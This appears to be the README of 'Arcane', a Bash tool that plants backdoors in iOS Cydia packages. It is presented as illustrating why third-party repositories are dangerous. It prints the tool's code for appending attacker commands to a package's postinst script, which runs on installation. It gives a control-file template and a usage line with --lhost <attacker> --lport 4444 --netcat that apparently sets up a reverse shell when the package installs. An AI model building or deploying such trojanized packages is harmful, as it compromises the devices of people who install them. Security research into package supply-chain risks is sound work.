Arcane is a simple script designed to backdoor iOS packages (iphone-arm) and create the necessar y resources for APT repositories. It was created for this publication to help illustrate why Cydia repositories can be dangerous and what post-exploitation attacks are possible from a compromised iOS device.
How Arcane works...
To understand what's happening in the GIF, decompress a package created with Arcane.
dpkg-deb -R /tmp/cydia/whois_5.3.2-1_iphoneos-arm_BACKDOORED.deb /tmp/whois-decomp
Notice the control and postinst files in the DEBIAN directory. Both files are important.
tree /tmp/whois-decomp/
/tmp/whois-decomp/
├── DEBIAN
│ ├── control
│ └── postinst
└── usr
└── bin
└── whois
It's possible to supply scripts as part of a package when installing or removing applications. Package maintainer scripts include the preinst, postinst, prerm, and postrm files. Arcane takes advantage of the postinst file to execute commands during the installation.
# The "post-installation" file. This file is generally responsible
# for executing commands on the OS after installing the required
# files. It's utilized by developers to manage and maintain various
# aspects of an installation. Arcane abuses this functionality by
# appending malicious Bash commands to the file.
postinst="$tmp/DEBIAN/postinst";
# A function to handle the type of command execution embedded into the
# postinst file.
function inject_backdoor ()
{
# If --file is used, `cat` the command(s) into the postinst file.
if [[ "$infile" ]]; then
cat "$infile" >> "$postinst";
embed="[$infile]";
else
# If no --file, utilize the simple Bash payload, previously
# defined.
echo -e "$payload" >> "$postinst";
embed="generic shell command";
fi;
status "embedded $embed into postinst" "error embedding backdoor" ;
chmod 0755 "$postinst"
};
The control file contains values that package management tools use when installing packages. Arcane will either modify an existing control or create it.
# The "control" file template. Most iOS packages will include a
# control file. In the event one is not found, Arcane will use the
# below template. The `$hacker` variable is used here to occupy
# various arbitrary fields.
# https://www.debian.org/doc/manuals/maint-guide/dreq.en.html
controlTemp="Package: com.$hacker.backdoor
Name: $hacker backdoor
Version: 1337
Section: app
Architecture: iphoneos-arm
Description: A backdoored iOS package
Author: $hacker <https://$hacker.github.io/>
Maintainer: $hacker <https://$hacker.github.io/>";
...
# An `if` statement to check for the control file.
if [[ ! -f "$tmp/DEBIAN/control" ]]; then
# If no control is detected, create it using the template.
echo "$controlTemp" > "$tmp/DEBIAN/control";
status "created control file" "error with control template";
else
# If a control file exists, Arcane will simply rename t he package
# as it appears in the list of available Cydia applications. This
# makes the package easier to location in Cydia.
msg "detected control file" succ;
sed -i '0,/^Name:.*/s//Name: $hacker backdoor/' "$tmp/DEBIAN/control";
status "modified control file" "error with control";
fi;
Usage
Clone the repository in Kali v2020.3.
sudo apt-get update; sudo apt-get install -Vy bzip2 netcat-traditional dpkg coreutils # dependencies
sudo git clone https://github.com/tokyoneon/arcane /opt/arcane
sudo chown $USER:$USER -R /opt/arcane/; cd /opt/arcane
chmod +x arcane.sh;./arcane.sh --help
Embed a command into a given package. See article for more info.
./arcane.sh --input samples/sed_4.5-1_iphoneos-arm.deb --lhost <attacker> --lport <4444> --cydia --netcat
Package samples
The repo includes packages for testing.
ls -la samples/
-rw-r--r-- 1 root root 100748 Jul 17 18:39 libapt-pkg-dev_1.8.2.1-1_iphoneos-arm.deb
-rw-r--r-- 1 root root 142520 Jul 22 06:21 network-cmds_543-1_iphoneos-arm.deb
-rw-r--r-- 1 root root 76688 Aug 29 2018 sed_4.5-1_iphoneos-arm.deb
-rw-r--r-- 1 root root 60866 Jul 8 21:03 top_39-2_iphoneos-arm.deb
-rw-r--r-- 1 root root 13810 Aug 29 2018 whois_5.3.2-1_iphoneos-arm.deb
MD5 sums, as found on the official Bingner repository.
md5sum samples/*.deb
3f1712964701580b3f018305a55e217c samples/libapt-pkg-dev_1.8.2.1-1_iphoneos-arm.deb
795ccf9c6d53dd60d2f74f7a601f474f samples/network-cmds_543-1_iphoneos-arm.deb
a020882dac121afa4b03c63304d729b0 samples/sed_4.5-1_iphoneos-arm.deb
38db275007a331e7ff8899ea22261dc7 samples/top_39-2_iphoneos-arm.deb
b40ee800b72bbac323568b36ad67bb16 samples/whois_5.3.2-1_iphoneos-arm.deb